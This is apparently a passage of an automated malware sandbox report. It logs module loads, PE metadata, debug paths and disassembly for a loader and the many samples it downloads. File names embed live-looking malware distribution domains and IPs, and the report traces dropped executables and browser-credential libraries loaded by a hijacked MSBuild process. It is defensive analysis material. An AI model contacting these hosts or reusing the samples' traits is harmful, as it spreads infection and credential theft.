Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\sysvplervcs.exe	Section loaded: apphelp.dll
Source: C:\Windows\sysvplervcs.exe	Section loaded: urlmon.dll
Source: C:\Windows\sysvplervcs.exe	Section loaded: wininet.dll
Source: C:\Windows\sysvplervcs.exe	Section loaded: iertutil.dll
Source: C:\Windows\sysvplervcs.exe	Section loaded: srvcli.dll
Source: C:\Windows\sysvplervcs.exe	Section loaded: netutils.dll
Source: C:\Users\user\Desktop\httpmales.mugutu.comrevada66df29a06624c_cry.exe.exe	Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\httpmales.mugutu.comrevada66df29a06624c_cry.exe.exe	Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\httpmales.mugutu.comrevada66df29a06624c_cry.exe.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\httpmales.mugutu.comrevada66df29a06624c_cry.exe.exe	Section loaded: version.dll
Source: C:\Users\user\Desktop\httpmales.mugutu.comrevada66df29a06624c_cry.exe.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\httpmales.mugutu.comrevada66df29a06624c_cry.exe.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\httpmales.mugutu.comrevada66df29a06624c_cry.exe.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\323057790.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\323057790.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\323057790.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\323057790.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\323057790.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\323057790.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\323057790.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll
Source: C:\Users\user\sysvplervcs.exe	Section loaded: apphelp.dll
Source: C:\Users\user\sysvplervcs.exe	Section loaded: urlmon.dll
Source: C:\Users\user\sysvplervcs.exe	Section loaded: wininet.dll
Source: C:\Users\user\sysvplervcs.exe	Section loaded: iertutil.dll
Source: C:\Users\user\sysvplervcs.exe	Section loaded: srvcli.dll
Source: C:\Users\user\sysvplervcs.exe	Section loaded: netutils.dll
Source: C:\Users\user\sysvplervcs.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\sysvplervcs.exe	Section loaded: wldp.dll
Source: C:\Users\user\sysvplervcs.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\sysvplervcs.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\sysvplervcs.exe	Section loaded: propsys.dll
Source: C:\Users\user\sysvplervcs.exe	Section loaded: profapi.dll
Source: C:\Users\user\sysvplervcs.exe	Section loaded: edputil.dll
Source: C:\Users\user\sysvplervcs.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\sysvplervcs.exe	Section loaded: sspicli.dll
Source: C:\Users\user\sysvplervcs.exe	Section loaded: wintypes.dll
Source: C:\Users\user\sysvplervcs.exe	Section loaded: appresolver.dll
Source: C:\Users\user\sysvplervcs.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\sysvplervcs.exe	Section loaded: slc.dll
Source: C:\Users\user\sysvplervcs.exe	Section loaded: userenv.dll
Source: C:\Users\user\sysvplervcs.exe	Section loaded: sppc.dll
Source: C:\Users\user\sysvplervcs.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\sysvplervcs.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\sysvplervcs.exe	Section loaded: mswsock.dll
Source: C:\Users\user\sysvplervcs.exe	Section loaded: napinsp.dll
Source: C:\Users\user\sysvplervcs.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\sysvplervcs.exe	Section loaded: wshbth.dll
Source: C:\Users\user\sysvplervcs.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\sysvplervcs.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\sysvplervcs.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\sysvplervcs.exe	Section loaded: winrnr.dll
Source: C:\Users\user\sysvplervcs.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\sysvplervcs.exe	Section loaded: winhttp.dll
Source: C:\Users\user\sysvplervcs.exe	Section loaded: winnsi.dll
Source: C:\Users\user\sysvplervcs.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\sysvplervcs.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\sysvplervcs.exe	Section loaded: firewallapi.dll
Source: C:\Users\user\sysvplervcs.exe	Section loaded: fwbase.dll
Source: C:\Users\user\sysvplervcs.exe	Section loaded: fwpolicyiomgr.dll
Source: C:\Users\user\sysvplervcs.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\sysvplervcs.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\sysvplervcs.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\400445\Batch.pif	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\400445\Batch.pif	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\400445\Batch.pif	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\400445\Batch.pif	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\400445\Batch.pif	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\400445\Batch.pif	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\400445\Batch.pif	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\400445\Batch.pif	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\400445\Batch.pif	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\400445\Batch.pif	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\400445\Batch.pif	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\400445\Batch.pif	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\400445\Batch.pif	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\400445\Batch.pif	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\400445\Batch.pif	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\400445\Batch.pif	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\400445\Batch.pif	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\400445\Batch.pif	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\400445\Batch.pif	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\400445\Batch.pif	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\400445\Batch.pif	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\400445\Batch.pif	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\400445\Batch.pif	Section loaded: ntasn1.dll

Source: C:\Users\user\Desktop\bomb.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: bomb.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: C:\Users\user\Desktop\http185.215.113.66pei.exe.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.9625_none_508ef7e4bcbbe589\MSVCR90.dll

Jump to behavior

Source: bomb.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: bomb.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: mozglue.pdbP source: MSBuild.exe, 00000008.00000002.3283432076.000000002801A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.3380126780.000000006C14D000.00000002.00000001.01000000.0000001D.sdmp
Source:	Binary string: freebl3.pdb source: MSBuild.exe, 00000008.00000002.3273773356.00000000220A4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: freebl3.pdbp source: MSBuild.exe, 00000008.00000002.3273773356.00000000220A4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb@ source: MSBuild.exe, 00000008.00000002.3314425570.000000003FDDF000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.3374099953.0000000067D0F000.00000002.00000001.01000000.0000001C.sdmp
Source:	Binary string: System.pdbN\|2h\|2 Z\|2_CorDllMainmscoree.dll source: bomb.exe, 00000000.00000002.2651263420.00000134317B0000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdb source: httpjask.powerforxes.shoprevada66af9bdbf0f60_team.exe.exe, 0000002D.00000002.2705737639.0000000004B40000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdbUGP source: httpjask.powerforxes.shoprevada66af9bdbf0f60_team.exe.exe, 0000002D.00000002.2705737639.0000000004B40000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: softokn3.pdb@ source: MSBuild.exe, 00000008.00000002.3300165687.0000000033EFF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: MSBuild.exe, 00000008.00000002.3308893640.0000000039E6F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: MSBuild.exe, 00000008.00000002.3291904631.000000002DF87000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: F:\Crypt @iamrebel777 29.09.2024\Notepad\obj\x86\Release\Notepad.pdb source: http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe, 00000006.00000000.1854912561.00000000003D2000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: nss3.pdb source: MSBuild.exe, 00000008.00000002.3314425570.000000003FDDF000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.3374099953.0000000067D0F000.00000002.00000001.01000000.0000001C.sdmp
Source:	Binary string: E:\HausBomber\obj\Release\bomb.pdb source: bomb.exe, 00000000.00000000.1744436497.000001342D922000.00000002.00000001.01000000.00000003.sdmp, bomb.exe, 00000000.00000002.2651263420.00000134317B0000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: MSBuild.exe, 00000008.00000002.3252838102.000000001C34E000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.3226573239.00000000044A8000.00000002.00001000.00020000.00000000.sdmp
Source:	Binary string: mozglue.pdb source: MSBuild.exe, 00000008.00000002.3283432076.000000002801A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.3380126780.000000006C14D000.00000002.00000001.01000000.0000001D.sdmp
Source:	Binary string: softokn3.pdb source: MSBuild.exe, 00000008.00000002.3300165687.0000000033EFF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: E:\HausBomber\obj\Release\bomb.pdbOEiE [E_CorExeMainmscoree.dll source: bomb.exe, 00000000.00000000.1744436497.000001342D922000.00000002.00000001.01000000.00000003.sdmp, bomb.exe, 00000000.00000002.2651263420.00000134317B0000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: F:\Crypt @iamrebel777 29.09.2024\Notepad\obj\x86\Release\Notepad.pdb$ source: http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe, 00000006.00000000.1854912561.00000000003D2000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: System.pdb source: bomb.exe, 00000000.00000002.2651263420.00000134317B0000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe.0.dr, Form_Main.cs

.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])

Source: bomb.exe

Static PE information: 0x93BF757E [Sun Jul 19 19:03:26 2048 UTC]

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 8_2_00418A63 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

8_2_00418A63

Source: initial sample

Static PE information: section where entry point is pointing to: 9OOCQ21h

Source: bomb.exe	Static PE information: real checksum: 0x0 should be: 0xca1f
Source: httpmales.mugutu.comrevada66df29a06624c_cry.exe.exe.0.dr	Static PE information: real checksum: 0x0 should be: 0x3562d
Source: http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe.0.dr	Static PE information: real checksum: 0x0 should be: 0xcfe9f
Source: http185.215.113.66newtpp.exe.exe.0.dr	Static PE information: real checksum: 0x0 should be: 0x24368
Source: httpmales.mugutu.comrevada66e06cea88f93_bluesapphire.exe.exe.0.dr	Static PE information: real checksum: 0x0 should be: 0x287475
Source: httpmales.mugutu.comyuop66cf535e3dcf9_BitcoinCore.exe.exe.0.dr	Static PE information: real checksum: 0x0 should be: 0x85f074
Source: 323057790.exe.3.dr	Static PE information: real checksum: 0x0 should be: 0x24368
Source: newtpp[1].exe.3.dr	Static PE information: real checksum: 0x0 should be: 0x24368
Source: httpjask.powerforxes.shopyuop66f13c8ec4580_uninstaller.exe.exe.0.dr	Static PE information: real checksum: 0x3efb8d should be: 0x58ed83
Source: sysvplervcs.exe.4.dr	Static PE information: real checksum: 0x0 should be: 0x24368

Source: httpmales.mugutu.comyuop66e096a0354a7_Burn.exe.exe.0.dr	Static PE information: section name: .didata
Source: httpjask.powerforxes.shoprevada66af9bdbf0f60_team.exe.exe.0.dr	Static PE information: section name: .didata
Source: httpmales.mugutu.comyuop66bf353c38733_Grids.exe.exe.0.dr	Static PE information: section name: .xdata
Source: httpjask.powerforxes.shoplopsa66dc99a997229_VirtualLibrary.exe.exe.0.dr	Static PE information: section name: .symtab
Source: httpjask.powerforxes.shopyuop66f6b9bd7a566_784865439765.exe#ss.exe.0.dr	Static PE information: section name: .didata
Source: httpmales.mugutu.comyuop66d5edf357fbf_BitcoinCore.exe.exe.0.dr	Static PE information: section name: .didata
Source: httpmales.mugutu.comyuop66ebf725efe38_lyla.exe.exe.0.dr	Static PE information: section name: /4
Source: httpmales.mugutu.comyuop66ebf725efe38_lyla.exe.exe.0.dr	Static PE information: section name: /14
Source: httpmales.mugutu.comyuop66ebf725efe38_lyla.exe.exe.0.dr	Static PE information: section name: /29
Source: httpmales.mugutu.comyuop66ebf725efe38_lyla.exe.exe.0.dr	Static PE information: section name: /41
Source: httpmales.mugutu.comyuop66ebf725efe38_lyla.exe.exe.0.dr	Static PE information: section name: /55
Source: httpmales.mugutu.comyuop66ebf725efe38_lyla.exe.exe.0.dr	Static PE information: section name: /67
Source: httpmales.mugutu.comyuop66ebf725efe38_lyla.exe.exe.0.dr	Static PE information: section name: /80
Source: httpmales.mugutu.comyuop66ebf725efe38_lyla.exe.exe.0.dr	Static PE information: section name: /91
Source: httpmales.mugutu.comyuop66ebf725efe38_lyla.exe.exe.0.dr	Static PE information: section name: /102
Source: httpjask.powerforxes.shopyuop66b4f6893d3c3_shapr3D.exe.exe.0.dr	Static PE information: section name: .xdata
Source: httpjask.powerforxes.shoprevada66eb0d09c9f08_Gads.exe.exe.0.dr	Static PE information: section name: .symtab
Source: httpmales.mugutu.comyuop66d32ff81a663_lump.exe.exe.0.dr	Static PE information: section name: +)>dXW>1
Source: httpmales.mugutu.comyuop66d32ff81a663_lump.exe.exe.0.dr	Static PE information: section name: mc*8RIf7
Source: httpmales.mugutu.comyuop66d32ff81a663_lump.exe.exe.0.dr	Static PE information: section name: L3.OdY!4
Source: httpmales.mugutu.comyuop66d32ff81a663_lump.exe.exe.0.dr	Static PE information: section name: i+B3fOPT
Source: httpmales.mugutu.comyuop66d32ff81a663_lump.exe.exe.0.dr	Static PE information: section name: 4I?:%,\P
Source: httpmales.mugutu.comyuop66d32ff81a663_lump.exe.exe.0.dr	Static PE information: section name: cJBEF:g3
Source: httpmales.mugutu.comyuop66d32ff81a663_lump.exe.exe.0.dr	Static PE information: section name: .7t*mT^X
Source: httpmales.mugutu.comyuop66d32ff81a663_lump.exe.exe.0.dr	Static PE information: section name: 7uwH9j'/
Source: httpmales.mugutu.comyuop66d32ff81a663_lump.exe.exe.0.dr	Static PE information: section name: 9OOCQ21h
Source: httpmales.mugutu.comyuop66d32ff81a663_lump.exe.exe.0.dr	Static PE information: section name: E5BeN"Ml
Source: httpmales.mugutu.comyuop66d32ff81a663_lump.exe.exe.0.dr	Static PE information: section name: Ebpr4)Y?
Source: httpmales.mugutu.comlopsa66dc99a997229_VirtualLibrary.exe.exe.0.dr	Static PE information: section name: .symtab
Source: httpmales.mugutu.comyuop66cf535e3dcf9_BitcoinCore.exe.exe.0.dr	Static PE information: section name: .didata
Source: httpmales.mugutu.comprog66c2d861a5b4d_google.exe.exe.0.dr	Static PE information: section name: .00cfg
Source: httpmales.mugutu.comprog66c2d861a5b4d_google.exe.exe.0.dr	Static PE information: section name: .text0
Source: httpmales.mugutu.comprog66c2d861a5b4d_google.exe.exe.0.dr	Static PE information: section name: .text1
Source: httpmales.mugutu.comprog66c2d861a5b4d_google.exe.exe.0.dr	Static PE information: section name: .text2
Source: httpjask.powerforxes.shopyuop66d9ddcb9dbfe_Build.exe.exe.0.dr	Static PE information: section name: .CLR_UEF
Source: httpjask.powerforxes.shopyuop66d9ddcb9dbfe_Build.exe.exe.0.dr	Static PE information: section name: .didat
Source: httpjask.powerforxes.shopyuop66d9ddcb9dbfe_Build.exe.exe.0.dr	Static PE information: section name: Section
Source: httpjask.powerforxes.shopyuop66d9ddcb9dbfe_Build.exe.exe.0.dr	Static PE information: section name: _RDATA

Source: C:\Users\user\Desktop\http185.215.113.66pei.exe.exe	Code function: 3_2_00841A31 push ecx; ret	3_2_00841A44
Source: C:\Users\user\Desktop\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe	Code function: 5_2_00EE20AD push edi; ret	5_2_00EE2982
Source: C:\Users\user\Desktop\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe	Code function: 5_2_00EE71A3 push ecx; ret	5_2_00EE71B6
Source: C:\Users\user\Desktop\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe	Code function: 5_2_00F37142 push ecx; ret	5_2_00F37155
Source: C:\Users\user\Desktop\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe	Code function: 5_2_00F372E0 push ds; retn 0003h	5_2_00F37395
Source: C:\Users\user\Desktop\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe	Code function: 5_2_00F373A6 push ds; retn 0003h	5_2_00F37395
Source: C:\Users\user\Desktop\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe	Code function: 5_2_00F3745C push ds; retf 0003h	5_2_00F3745D
Source: C:\Users\user\Desktop\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe	Code function: 5_2_00F399F5 push 0000004Ch; iretd	5_2_00F39A06
Source: C:\Users\user\Desktop\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe	Code function: 5_2_00F08C29 push esi; retf 0000h	5_2_00F08D01
Source: C:\Users\user\Desktop\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe	Code function: 5_2_00F25DB5 push ecx; ret	5_2_00F25DC8
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Code function: 6_2_02724659 push edx; retf 0004h	6_2_0272465A
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Code function: 6_2_02724759 push esi; retf 0004h	6_2_0272475A
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Code function: 6_2_02724791 push edi; retf 0004h	6_2_02724792
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Code function: 6_2_02725B1B pushad ; retf	6_2_02725B3F
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Code function: 6_2_07233748 pushfd ; retf	6_2_07233749
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Code function: 6_2_07233ECA push esp; iretd	6_2_07233ED1
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Code function: 6_2_07232572 push esp; ret	6_2_07232579
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Code function: 6_2_07239811 push cs; retf	6_2_0723981E
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Code function: 6_2_0723D864 pushad ; retf	6_2_0723FF1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0042F262 push ecx; ret	8_2_0042F275
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_00422E59 push esi; ret	8_2_00422E5B
